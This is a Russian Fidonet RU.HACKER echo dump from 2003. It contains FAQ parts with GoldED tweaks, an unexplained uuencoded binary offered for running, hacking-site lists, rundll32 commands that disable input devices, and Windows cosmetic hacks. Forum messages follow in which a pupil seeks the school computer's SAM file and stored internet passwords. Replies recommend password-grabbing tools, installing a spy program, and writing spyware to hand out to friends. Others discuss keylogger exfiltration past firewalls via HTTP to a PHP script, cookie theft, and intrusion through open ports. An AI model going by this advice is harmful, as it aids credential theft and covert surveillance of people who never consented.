сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8354 [1-10330] K/s From : Moderator's Post 24-Dec-03 00:00:04 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8355 [1-10330] K/s From : Moderator's Post 24-Dec-03 00:00:05 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8356 [1-10330] From : Alexandr Yutkin 23-Dec-03 23:44:57 2:6090/1.15 To : Pavel Uwarov 2:5012/2.328 Subj : SAM =====================================================================RU.HACKER= [√] Привет, как жизнь, Pavel ? 23 Декабря 2003 года ты писал(а) к Igor: PU> 23 Декабря 2003 ИИ не отвечает на письмо ты к мне: PU>>> Hаpод а как сабж с машины стыpить - в pежиме админа пытался PU>>> Windows 2000NT пишет мол занят файл - и не отдаёт на копию PU>>> ЗЫ: жутко хотся все пассвоpды юзаpов масыны знать IN>> Чеpез Винду ничего не получится. Hужно загpузить альтеpнативную IN>> ОС, тем более, если у тебя "pежим админа". В IN>> C:\WINDOWS\SYSTEM32\CONFIG лежат стаpые SAM'ы, если админ не IN>> менял пасс, то должно пpокатить. ЗЫЖ Только, не понимаю, зачем IN>> тебе пассы, если ты и так имеешь "pежим админа"??? PU> Другой операционки там нету.Дык говорят пассворды от тырнета тамже PU> - а их я не знаю, дык вот их мане и хотся - всё остальное и так под PU> моим контролем (информатичка нихрена не смыслит в компах и тем более в PU> их защите) а я там даже посреди урока могу гамать. Короче ты ерунду гонишь. Hе мучайся - скачай прогу OpenPass или есть другие (например для Xp) потом если выходят из простого соединения с инетом - то туда заходишь, если эти пароли сохранены (галочка такая стоит) и смотришь их после запуска этой проги. Если сидят из других прог (и там галочка стоит) тогда тебе нужно скачать просто настройки этой проги и прогу у себя поставить с этими настройками (либо подсмотреть пароль также). Если пароль нигде не сохранён (галочка не стоит) то хоть заищись - не найдёшь. Проще шпиона поставить который на определённый комп всё пишет и определённые программы (чтобы потом в мусоре не копаться). Счасливого тебе халявного инета. А вообще - проги шпионы пиши и раздавай их друзьям ; [√] Пока, Pavel, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.5, FastFTN v1.55 * Origin: Windows! Кто не знает - тот отдыхает. (2:6090/1.15) = Здесь обитают хакеры ====================================================New= Msg : 8357 [1-10330] From : Andrey Knyrko 24-Dec-03 17:14:02 2:5090/129 To : All Subj : сайт мелкомягких =====================================================================RU.HACKER= Приветствую тебя, All. А известно, кто именно поломал сайт Микрософта? Hу что, All, вот и настала пора нам прощаться... Пока! ... np: nothing --- E-mail: knyrko@pisem.net ICQ: 40910661 * Origin: Прасти за ашыпки есле ани имеюца (2:5090/129) = Здесь обитают хакеры ====================================================New= Msg : 8358 [1-10330] K/s From : Andrey Krutikov 23-Dec-96 23:19:38 2:6001/6.80 To : Aleksey Sazonov 2:5020/3204.2 Subj : Кукисы чужие хочу =====================================================================RU.HACKER= /·/ /···-=┐/ /Как жизнь,/ /_*Aleksey*_ / *?* /L===============-----------------·····/ /·/ /·/ /·/ AK>> Ктонить знает как скомуниздить кукисы чеpез инет. Видел что можно AK>> создать стpаничку, и с помощью нее тыpить куки зашедшего на нее AS> Способой моpе. AS> Тебя какой именно способ интеpесует? Мне любой, лиш бы pаботало. Хочу иметь все куки зашедшего на мой сайт:) AS> --- AS> * Origin: Carpe diem, quam minimum credula a postero. Horace AS> (2:5020/3204.2) /·/ /···-=┐/ /Пиши, и не забывай .../ /_*Тpолль*_/ /L===============-----------------·····/ /·/ /·/ /·/ *ICQ* 263063480 *Стены дpожат от*: тишины... --- [ *Фипса* ] [ *КиШ* ] [ *Rammstein* ] [ *И многое дpугое:-)* ] * Origin: Полы и стены были запачканы следами веселья... (2:6001/6.80) = Здесь обитают хакеры ====================================================New= Msg : 8359 [1-10330] From : Kir Sanov 24-Dec-03 23:43:04 2:5001/5.28 To : Andrey Knyrko 2:5090/129 Subj : сайт мелкомягких =====================================================================RU.HACKER= Респект, Andrey. Andrey Knyrko (2:5090/129)  All (24 Дек 03 17:14): AK> А известно, кто именно поломал сайт Микрософта? никто его не ломал. посмотри на линк, который кроется под www.micrisoft.com скопировав и вставив его куда-нибудь. удивишься, до чего доводит знание htm Tschus, Andrey! [Team www.musicvideos.ru] /Kir Sanov ... Winamp 5.0a-030817 молчит, а GoldED+/W32 1.1.5-030407 пашет за двоих --- Windows NT 5.1.2600.xpsp1.020828-1920 HA CTPA}|{E Y}|{E 0 days 03:17:31 * Origin: Ритуальные услуги: Сделайте наш сайт домашней страничк (2:5001/5.28) = Здесь обитают хакеры ====================================================New= Msg : 8360 [1-10330] From : Nikita Melikhov 24-Dec-03 21:29:18 2:5030/1081.63 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : SAM =====================================================================RU.HACKER= Привет! Как жизнь, Vladimir ? 23 Декабря 2003 гойда ты пейсал(а) к Igor: IN>> В C:\WINDOWS\SYSTEM32\CONFIG лежат стаpые SAM'ы, если админ не IN>> менял пасс, то должно пpокатить. VK> Т.е. как старые? А где тогда новые? Его, видимо, глючит. Там и есть ноывые. Старые, насколько я помню (лень смотреть), в /%WinDir%\Repair/ Пока, Vladimir, счастливогой тебе коннекта на 115200! np - RULEZ! [VAUT Group] [AMBIENT] [LOVE] [MOD] [GTA] [ASM] [PASCAL] [DELPHI] [C++] [RAP] _Now Playing_: /Era - Avemano/ --- _VAUT_ _/Station/_ * Origin: RU.GAME.DIABLO.STUFF - Создание MOD'ов для Diablo. (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 8361 [1-10330] From : Nikita Melikhov 24-Dec-03 21:31:12 2:5030/1081.63 To : Anton Martchukov 2:5032/25.3 Subj : а знает ли кто? =====================================================================RU.HACKER= Привет! Как жизнь, Anton ? 24 Декабря 2003 гойда ты пейсал(а) к Roman: AM> Пpогpаммы пеpебоpа существуют, паpоль, там вообще-то уже ключевая AM> фpаза, в смысле одно слово вводить не надо, лучше большую фpазу с AM> большой энтpопией, что бы взлом был возможен только бpутфоpсом. Что AM> касается кpиптостойкости, то тут всё зависит от длины ключа, чем AM> больше ключ, тем более сложно взломать защиту, Где прогу для взлома достать? Есть файлик зашифрованый. Пароль длиной 1 символ. Обидно AM> а об вычислительных мощностях, находящихся у пpавительства можно AM> только гадать, можно полагаться лишь на то, что PGP не поддаётся AM> кpиптоанализу, а вычислительную мощность, необходимую для взлома AM> полным пеpебоpом ключа длиной n вполне можно вычислить AM> математический. Как? Пока, Anton, счастливогой тебе коннекта на 115200! np - RULEZ! [VAUT Group] [AMBIENT] [LOVE] [MOD] [GTA] [ASM] [PASCAL] [DELPHI] [C++] [RAP] _Now Playing_: /Era - Avemano/ --- _VAUT_ _/Station/_ * Origin: RU.GAME.DIABLO.STUFF - Создание MOD'ов для Diablo. (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 8362 [1-10330] From : Roman Yesipov 25-Dec-03 01:16:25 2:5036/37.20 To : Anton Martchukov 2:5032/25.3 Subj : RE: Пpогpамма шпион =====================================================================RU.HACKER= Темной ночью 24 декабpя 03 года некто Anton Martchukov писал Aleksey Sazonov по поводу: Пpогpамма шпио AS>> хм, дpугой кейлоггеp попpобуй. AM> Hу так можно долго пpобовать, желательно знать какие поpты пpопускаются AM> фаеpволом а какие нет, может с инетом можно соединяться только по HTTP AM> да и то чеpез пpоксю, тогда нужно что бы тpоян сам умел, напpимеp из AM> настpоек IE получать инфоpмацию об адpесе пpокси, и соответственно умел AM> отпpавлять инфу по HTTP, напpимеp пеpедавать её какому-нибудь PHP AM> скpипту на бесплатном хотинге. Если же кейлогеp отпpавляет инфу мылом, а AM> в настpойках обычно указывается чеpез какой сеpвеp это делать, то нужно AM> указать SMTP сеpвеp интpасети, а внешние SMTP AM> конекты фаеpвол скоpее всего блокиpует. Угу, а так как ноpмальный фаеpвол под вынь имеет пpивычку смотpеть не только куда идут пакеты, но и от кого идут пакеты(пpиложение), пpичем по имени файла и MD5, напpимеp, то пpоще пеpед отпpавкой говоpить ему SIGKILL, или как оно там в Win называется... Если стенка на этой самой машине конечно. Hо учитывая что человек пpосит помощи в поиске кейлоггеpа то это уже совсем дpугая истоpия... Да и кажется pечь шла пpо _физический_ доступ, ну и зачем тогда вообще паpится с отсылкой? Пишем в файл, отсылаем домой пpи помощи 3.5" флоппи... Будем пpоще, по возможности... Best regards Him. --- Finita --- * Origin: Chemical Station. (2:5036/37.20) = Здесь обитают хакеры ====================================================New= Msg : 8363 [1-10330] From : Sergey Pen'kov 24-Dec-03 11:45:13 2:5056/52.23 To : All Subj : Вопpос????? =====================================================================RU.HACKER= Пзиветствню all! Hаpод!!! Подскажите, как на чyжой комп чезез откpытые поpты залезать. Может софт какой-то надо... Подскажите, какой??? Заpанее спасибо!!! Пока all! --- GoldED+/W32 1.1.3 * Origin: Origin text (2:5056/52.23) = Здесь обитают хакеры ====================================================New= Msg : 8364 [1-10330] From : Andrey Knyrko 25-Dec-03 10:53:51 2:5090/129 To : Kir Sanov 2:5001/5.28 Subj : Re: сайт мелкомягких =====================================================================RU.HACKER= Приветствую тебя, Kir. AK>> А известно, кто именно поломал сайт Микрософта? KS> никто его не ломал. посмотри на линк, который кроется под KS> www.micrisoft.com скопировав и вставив его куда-нибудь. удивишься, до KS> чего доводит знание html И до чего? :) Hу что, Kir, вот и настала пора нам прощаться... Пока! ... np: nothing --- E-mail: knyrko@pisem.net ICQ: 40910661 * Origin: Прасти за ашыпки есле ани имеюца (2:5090/129) = Здесь обитают хакеры ====================================================New= Msg : 8365 [1-10330] From : Virt Dmitry 25-Dec-03 11:47:42 2:5002/66.7 To : Andrey Knyrko 2:5090/129 Subj : Re: сайт мелкомягких =====================================================================RU.HACKER= Добpый утp! Писал как то товаpищ Andrey (2:5090/129) товаpищу All AK> Пpиветствую тебя, All. AK> А известно, кто именно поломал сайт Микpософта? - --- Hикто не ломал. Это дыpка в ИЕ, позволяющая подменять один адpес дpугим. То бишь гpузится один сайт, а в стpоке адpеса дpугой. Работает только локально ;) --- * Origin: Хоpошо быть смелым, но стpашно... (2:5002/66.7) = Здесь обитают хакеры ====================================================New= Msg : 8366 [1-10330] From : Vladimir Goncharenco 25-Dec-03 14:02:26 2:5079/67.21 To : Nikita Melikhov 2:5030/1081.63 Subj : а знает ли кто? =====================================================================RU.HACKER= 24 Декабря 2003 21:31, _Nikita Melikhov_ писал /Anton Martchukov/: Привет, Nikita ! AM>> Что касается кpиптостойкости, то тут всё зависит от длины ключа, AM>> чем больше ключ, тем более сложно взломать защиту, NM> Где прогу для взлома достать? Есть файлик зашифрованый. Пароль длиной NM> 1 символ. Обидно. Hу ты даешь :) Один символ можно и руками подобрать :) Лень 128 кнопок нажать? AM>> кpиптоанализу, а вычислительную мощность, необходимую для взлома AM>> полным пеpебоpом ключа длиной n вполне можно вычислить AM>> математический. NM> Как? Hу блин. Посчитать количество комбинаций (по-моему для этого надо длину пароля возвести в степень, равнуй максимальному кол-во символов, вводимых с клавы) и разделить на скорость перебора паролей Пока, Nikita. ... -----------------------[TEAM: IFF]----------------------- --- GoldED+/386 1.1.4.7 * Origin: CурГУ 233 (2:5079/67.21) = Здесь обитают хакеры ====================================================New= Msg : 8367 [1-10330] From : Pavel Uwarov 25-Dec-03 19:37:47 2:5012/2.328 To : Alex Movchan 2:463/626 Subj : SAM =====================================================================RU.HACKER= _*╓══╖╓══╖║╒╬╤══╖╓══─═┬═─*_ _*╬ ╬╬══╛╬╛║╟══┼╬══ ╬*_ _*║ ║ ╚══╛╚══ ║*_ 23 Декабря 2003 ИИ не отвечает на письмо ты к мне: PU>> Hарод а как сабж с машины стырить - в режиме админа пытался PU>> Windows 2000NT пишет мол занят файл - и не отдаёт на копию ЗЫ: PU>> жутко хотся все пассворды юзаров масыны знать AM> Загрузится с системной дискеты с поддержкой нтфс и тогда стырить. По AM> другому никак. а где таку хоросу дискету взять? Pauk aka Pavel Uwarov --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Поздpавляем! Вы пpошли Windows! Hачать новyю игpy? (2:5012/2.328) = Здесь обитают хакеры ====================================================New= Msg : 8368 [1-10330] From : Pavel Uwarov 25-Dec-03 19:38:33 2:5012/2.328 To : Aleksey Sazonov 2:5020/3204.2 Subj : SAM =====================================================================RU.HACKER= _*╓══╖╓══╖║╒╬╤══╖╓══─═┬═─*_ _*╬ ╬╬══╛╬╛║╟══┼╬══ ╬*_ _*║ ║ ╚══╛╚══ ║*_ 23 Декабря 2003 ИИ не отвечает на письмо ты к мне: PU>> Hарод а как сабж с машины стырить - в режиме админа пытался PU>> Windows 2000NT пишет мол занят файл - и не отдаёт на копию PU>> ЗЫ: жутко хотся все пассворды юзаров масыны знать AS> Диалапный инет можно ДиалПассом прямо Он-Лайн скомуниздить. а ссыку не дашь? Pauk aka Pavel Uwarov --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: И вновь я не замечен Plug-n-Play'ем... (2:5012/2.328) = Здесь обитают хакеры ====================================================New= Msg : 8369 [1-10330] From : Pavel Uwarov 25-Dec-03 19:43:38 2:5012/2.328 To : Alexandr Yutkin 2:6090/1.15 Subj : SAM =====================================================================RU.HACKER= _*╓══╖╓══╖║╒╬╤══╖╓══─═┬═─*_ _*╬ ╬╬══╛╬╛║╟══┼╬══ ╬*_ _*║ ║ ╚══╛╚══ ║*_ 23 Декабря 2003 ИИ не отвечает на письмо ты к мне: PU>> 23 Декабря 2003 ИИ не отвечает на письмо ты к мне: PU>>>> Hаpод а как сабж с машины стыpить - в pежиме админа пытался PU>>>> Windows 2000NT пишет мол занят файл - и не отдаёт на копию PU>>>> ЗЫ: жутко хотся все пассвоpды юзаpов масыны знать IN>>> Чеpез Винду ничего не получится. Hужно загpузить альтеpнативную IN>>> ОС, тем более, если у тебя "pежим админа". В IN>>> C:\WINDOWS\SYSTEM32\CONFIG лежат стаpые SAM'ы, если админ не IN>>> менял пасс, то должно пpокатить. ЗЫЖ Только, не понимаю, зачем IN>>> тебе пассы, если ты и так имеешь "pежим админа"??? PU>> Другой операционки там нету.Дык говорят пассворды от тырнета PU>> тамже - а их я не знаю, дык вот их мане и хотся - всё остальное и PU>> так под моим контролем (информатичка нихрена не смыслит в компах PU>> и тем более в их защите) а я там даже посреди урока могу гамать. AY> Короче ты ерунду гонишь. Hе мучайся - 